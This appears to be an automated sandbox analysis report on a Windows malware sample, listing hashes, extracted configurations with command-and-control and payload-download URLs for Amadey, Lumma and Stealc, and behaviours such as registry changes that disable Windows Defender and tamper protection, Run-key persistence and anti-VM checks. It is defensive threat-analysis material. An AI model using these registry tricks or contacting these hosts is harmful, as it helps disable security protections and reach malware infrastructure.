Analysis

- max time kernel: 146s
- max time network: 151s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 30/03/2025, 13:33
Static task: static1

Behavioral task: behavioral1
- Sample: 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
- Resource: win7-20240903-en

Behavioral task: behavioral2
- Sample: 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
- Resource: win10v2004-20250314-en
General

- Target: 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
- Size: 938KB
- MD5: 8c87bad579d801bb7bea5acc51e8fe5d
- SHA1: 78b3bdaad59a371cf44e709e94ec00ccdc05421c
- SHA256: dae649137a35a584025e94fee43e229a06818d9f9e600dd9d4a6917b2e01b6cb
- SHA512: 6fb9a96f6a83e42ae8be6b1ea00ba8417628a38e81654190f37602de36ee2ff6f1c7843eb9acd6991f254a5edfd5efc42b74af144a66fbb35b7fb410ca7692dc
- SSDEEP: 24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Su:ATvC/MTQYxsWR7a0S
Malware Config

Extracted
- http://176.113.115.7/mine/random.exe

Extracted: amadey
- 5.21
- 092155
- http://176.113.115.6
- install_dir: bb556cff4a
- install_file: rapes.exe
- strings_key: a131b127e996a898cd19ffb2d92e481b
- url_paths: /Ni9kiput/index.php

Extracted: lumma
- https://rodformi.run/aUosoz
- https://metalsyo.digital/opsa
- https://ironloxp.live/aksdd
- https://navstarx.shop/FoaJSi
- https://starcloc.bet/GOksAo
- https://advennture.top/GKsiio
- https://targett.top/dsANGt
- https://spacedbv.world/EKdlsk
- https://galxnetb.today/GsuIAo
- https://esccapewz.run/ANSbwqy
- https://travewlio.shop/ZNxbHi
- https://touvrlane.bet/ASKwjq
- https://sighbtseeing.shop/ASJnzh
- https://holidamyup.today/AOzkns
- https://mtriplooqp.world/APowko

Extracted: stealc
- trump
- http://45.93.20.28
- url_path: /85a1cacf11314eb8.php
Signatures

Amadey family

Detect Xworm Payload 3 IoCs

| resource | yara_rule |
| --- | --- |
| behavioral1/files/0x0006000000017570-38.dat | family_xworm |
| behavioral1/memory/2956-46-0x0000000000080000-0x00000000000A8000-memory.dmp | family_xworm |
| behavioral1/memory/2196-590-0x0000000000A00000-0x0000000000A28000-memory.dmp | family_xworm |

Detects Healer an antivirus disabler dropper 3 IoCs

| resource | yara_rule |
| --- | --- |
| behavioral1/memory/3352-321-0x0000000001290000-0x00000000016EE000-memory.dmp | healer |
| behavioral1/memory/3352-322-0x0000000001290000-0x00000000016EE000-memory.dmp | healer |
| behavioral1/memory/3352-359-0x0000000001290000-0x00000000016EE000-memory.dmp | healer |

Gcleaner family

Healer family

Lumma family

| description | ioc | Process |
| --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | 9d780b6f18.exe |

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 9d780b6f18.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 9d780b6f18.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 9d780b6f18.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | 9d780b6f18.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 9d780b6f18.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 9d780b6f18.exe |

| description | ioc | Process |
| --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 9d780b6f18.exe |

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | 9d780b6f18.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | 9d780b6f18.exe |

Stealc family

Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 9c32fb17b4.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0eb65cfefc.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 9d780b6f18.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 78577724d0.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 532fd2aeef.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | a4bb584db7.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 4aa41be87a.exe |

Blocklisted process makes network request 1 IoCs

| flow | pid | Process |
| --- | --- | --- |
| 4 | 2328 | powershell.exe |

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe |

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run PowerShell and hide display window.

| pid | Process |
| --- | --- |
| 2328 | powershell.exe |
| 2064 | powershell.exe |
| 1384 | powershell.exe |
| 956 | powershell.exe |
| 844 | powershell.exe |

Downloads MZ/PE file 12 IoCs

| flow | pid | Process |
| --- | --- | --- |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 7 | 1756 | rapes.exe |
| 4 | 2328 | powershell.exe |

.NET Reactor protector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

| resource | yara_rule |
| --- | --- |
| behavioral1/files/0x0006000000017570-38.dat | net_reactor |
| behavioral1/memory/2956-46-0x0000000000080000-0x00000000000A8000-memory.dmp | net_reactor |
| behavioral1/memory/2196-590-0x0000000000A00000-0x0000000000A28000-memory.dmp | net_reactor |
Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

| description | ioc | Process |
| --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 9d780b6f18.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 78577724d0.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 78577724d0.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 532fd2aeef.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 9c32fb17b4.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0eb65cfefc.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0eb65cfefc.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | a4bb584db7.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | a4bb584db7.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4aa41be87a.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 9d780b6f18.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 532fd2aeef.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4aa41be87a.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 9c32fb17b4.exe |

Drops startup file 2 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk | NP4kBrG.exe |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk | NP4kBrG.exe |

Executes dropped EXE 18 IoCs

| pid | Process |
| --- | --- |
| 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| 1756 | rapes.exe |
| 2956 | NP4kBrG.exe |
| 2672 | 9c32fb17b4.exe |
| 2176 | 0eb65cfefc.exe |
| 1996 | smss.exe |
| 1784 | 75c64a5fe4.exe |
| 3352 | 9d780b6f18.exe |
| 3624 | 78577724d0.exe |
| 3880 | d22426bcf1.exe |
| 2088 | 532fd2aeef.exe |
| 1700 | svchost015.exe |
| 3848 | a4bb584db7.exe |
| 3688 | svchost015.exe |
| 3180 | 70d75e69ad.exe |
| 3368 | 4aa41be87a.exe |
| 2196 | smss.exe |
| 3864 | A9cowK5.exe |

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | 9d780b6f18.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | 532fd2aeef.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | 4aa41be87a.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | 9c32fb17b4.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | 78577724d0.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | a4bb584db7.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | rapes.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | 0eb65cfefc.exe |

Loads dropped DLL 41 IoCs

| pid | Process |
| --- | --- |
| 2328 | powershell.exe |
| 2328 | powershell.exe |
| 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 2088 | 532fd2aeef.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 3848 | a4bb584db7.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 3216 | WerFault.exe |
| 3216 | WerFault.exe |
| 3216 | WerFault.exe |
| 3216 | WerFault.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 1756 | rapes.exe |
| 3676 | MsiExec.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |
| 3740 | rundll32.exe |

Reads user/profile data of local email clients 2 TTPs

Email clients store some user data on disk where infostealers will often target it.

Windows security modification 2 TTPs 2 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | 9d780b6f18.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 9d780b6f18.exe |

Adds Run key to start application 2 TTPs 5 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\75c64a5fe4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381470101\\75c64a5fe4.exe" | rapes.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\9d780b6f18.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381480101\\9d780b6f18.exe" | rapes.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smss.exe" | NP4kBrG.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\9c32fb17b4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381450101\\9c32fb17b4.exe" | rapes.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\0eb65cfefc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381460101\\0eb65cfefc.exe" | rapes.exe |
Checks installed software on the system 1 TTPs

Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

| description | ioc | Process |
| --- | --- | --- |
| File opened (read-only) | \??\I: | msiexec.exe |
| File opened (read-only) | \??\O: | msiexec.exe |
| File opened (read-only) | \??\X: | msiexec.exe |
| File opened (read-only) | \??\P: | msiexec.exe |
| File opened (read-only) | \??\R: | msiexec.exe |
| File opened (read-only) | \??\S: | msiexec.exe |
| File opened (read-only) | \??\V: | msiexec.exe |
| File opened (read-only) | \??\R: | msiexec.exe |
| File opened (read-only) | \??\S: | msiexec.exe |
| File opened (read-only) | \??\W: | msiexec.exe |
| File opened (read-only) | \??\G: | msiexec.exe |
| File opened (read-only) | \??\H: | msiexec.exe |
| File opened (read-only) | \??\I: | msiexec.exe |
| File opened (read-only) | \??\J: | msiexec.exe |
| File opened (read-only) | \??\O: | msiexec.exe |
| File opened (read-only) | \??\G: | msiexec.exe |
| File opened (read-only) | \??\J: | msiexec.exe |
| File opened (read-only) | \??\K: | msiexec.exe |
| File opened (read-only) | \??\Q: | msiexec.exe |
| File opened (read-only) | \??\Y: | msiexec.exe |
| File opened (read-only) | \??\B: | msiexec.exe |
| File opened (read-only) | \??\E: | msiexec.exe |
| File opened (read-only) | \??\H: | msiexec.exe |
| File opened (read-only) | \??\L: | msiexec.exe |
| File opened (read-only) | \??\U: | msiexec.exe |
| File opened (read-only) | \??\Z: | msiexec.exe |
| File opened (read-only) | \??\E: | msiexec.exe |
| File opened (read-only) | \??\N: | msiexec.exe |
| File opened (read-only) | \??\K: | msiexec.exe |
| File opened (read-only) | \??\T: | msiexec.exe |
| File opened (read-only) | \??\X: | msiexec.exe |
| File opened (read-only) | \??\T: | msiexec.exe |
| File opened (read-only) | \??\Y: | msiexec.exe |
| File opened (read-only) | \??\M: | msiexec.exe |
| File opened (read-only) | \??\U: | msiexec.exe |
| File opened (read-only) | \??\Z: | msiexec.exe |
| File opened (read-only) | \??\A: | msiexec.exe |
| File opened (read-only) | \??\P: | msiexec.exe |
| File opened (read-only) | \??\V: | msiexec.exe |
| File opened (read-only) | \??\A: | msiexec.exe |
| File opened (read-only) | \??\L: | msiexec.exe |
| File opened (read-only) | \??\W: | msiexec.exe |
| File opened (read-only) | \??\M: | msiexec.exe |
| File opened (read-only) | \??\N: | msiexec.exe |
| File opened (read-only) | \??\Q: | msiexec.exe |
| File opened (read-only) | \??\B: | msiexec.exe |

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

| resource | yara_rule |
| --- | --- |
| behavioral1/files/0x0006000000018fdf-135.dat | autoit_exe |

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

| pid | Process |
| --- | --- |
| 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| 1756 | rapes.exe |
| 2672 | 9c32fb17b4.exe |
| 2176 | 0eb65cfefc.exe |
| 3352 | 9d780b6f18.exe |
| 3624 | 78577724d0.exe |
| 2088 | 532fd2aeef.exe |
| 3848 | a4bb584db7.exe |
| 3368 | 4aa41be87a.exe |

Suspicious use of SetThreadContext 2 IoCs

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2088 set thread context of 1700 | 2088 | 532fd2aeef.exe | 82 |
| PID 3848 set thread context of 3688 | 3848 | a4bb584db7.exe | 84 |

Drops file in Windows directory 1 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File created | C:\Windows\Tasks\rapes.job | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |

Enumerates physical storage devices 1 TTPs

Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 532fd2aeef.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost015.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | 75c64a5fe4.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost015.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4aa41be87a.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 0eb65cfefc.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 75c64a5fe4.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d22426bcf1.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 9d780b6f18.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | a4bb584db7.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | A9cowK5.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rapes.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 9c32fb17b4.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | 75c64a5fe4.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 78577724d0.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | firefox.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe |

Kills process with taskkill 5 IoCs

| pid | Process |
| --- | --- |
| 2492 | taskkill.exe |
| 1692 | taskkill.exe |
| 2888 | taskkill.exe |
| 392 | taskkill.exe |
| 2364 | taskkill.exe |

Modifies Internet Explorer settings

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe |

Modifies registry class 6 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | explorer.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings | firefox.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings | explorer.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | explorer.exe |

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

| pid | Process |
| --- | --- |
| 2340 | schtasks.exe |
| 1952 | schtasks.exe |
Suspicious behavior: EnumeratesProcesses 39 IoCs

| pid | Process |
| --- | --- |
| 2328 | powershell.exe |
| 2328 | powershell.exe |
| 2328 | powershell.exe |
| 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| 1756 | rapes.exe |
| 2064 | powershell.exe |
| 1384 | powershell.exe |
| 956 | powershell.exe |
| 844 | powershell.exe |
| 2956 | NP4kBrG.exe |
| 2672 | 9c32fb17b4.exe |
| 2672 | 9c32fb17b4.exe |
| 2672 | 9c32fb17b4.exe |
| 2672 | 9c32fb17b4.exe |
| 2672 | 9c32fb17b4.exe |
| 2176 | 0eb65cfefc.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 3352 | 9d780b6f18.exe |
| 3352 | 9d780b6f18.exe |
| 3352 | 9d780b6f18.exe |
| 3352 | 9d780b6f18.exe |
| 3624 | 78577724d0.exe |
| 3624 | 78577724d0.exe |
| 3624 | 78577724d0.exe |
| 3624 | 78577724d0.exe |
| 3624 | 78577724d0.exe |
| 3624 | 78577724d0.exe |
| 2088 | 532fd2aeef.exe |
| 2088 | 532fd2aeef.exe |
| 3848 | a4bb584db7.exe |
| 3848 | a4bb584db7.exe |
| 3368 | 4aa41be87a.exe |
| 3368 | 4aa41be87a.exe |
| 3368 | 4aa41be87a.exe |
| 3368 | 4aa41be87a.exe |
| 3368 | 4aa41be87a.exe |
| 3368 | 4aa41be87a.exe |

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

| pid | Process |
| --- | --- |
| 2236 | explorer.exe |

Suspicious use of AdjustPrivilegeToken 64 IoCs

| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 2328 | powershell.exe |
| Token: SeDebugPrivilege | 2956 | NP4kBrG.exe |
| Token: SeDebugPrivilege | 2064 | powershell.exe |
| Token: SeDebugPrivilege | 1384 | powershell.exe |
| Token: SeDebugPrivilege | 956 | powershell.exe |
| Token: SeDebugPrivilege | 844 | powershell.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeDebugPrivilege | 2956 | NP4kBrG.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeDebugPrivilege | 1996 | smss.exe |
| Token: SeDebugPrivilege | 2492 | taskkill.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeDebugPrivilege | 1692 | taskkill.exe |
| Token: SeDebugPrivilege | 2888 | taskkill.exe |
| Token: SeDebugPrivilege | 392 | taskkill.exe |
| Token: SeDebugPrivilege | 2364 | taskkill.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeDebugPrivilege | 1704 | firefox.exe |
| Token: SeDebugPrivilege | 1704 | firefox.exe |
| Token: SeDebugPrivilege | 3352 | 9d780b6f18.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeDebugPrivilege | 2196 | smss.exe |
| Token: SeDebugPrivilege | 3864 | A9cowK5.exe |
| Token: SeShutdownPrivilege | 2236 | explorer.exe |
| Token: SeShutdownPrivilege | 3912 | msiexec.exe |
| Token: SeIncreaseQuotaPrivilege | 3912 | msiexec.exe |
| Token: SeRestorePrivilege | 3920 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 3920 | msiexec.exe |
| Token: SeSecurityPrivilege | 3920 | msiexec.exe |
| Token: SeCreateTokenPrivilege | 3912 | msiexec.exe |
| Token: SeAssignPrimaryTokenPrivilege | 3912 | msiexec.exe |
| Token: SeLockMemoryPrivilege | 3912 | msiexec.exe |
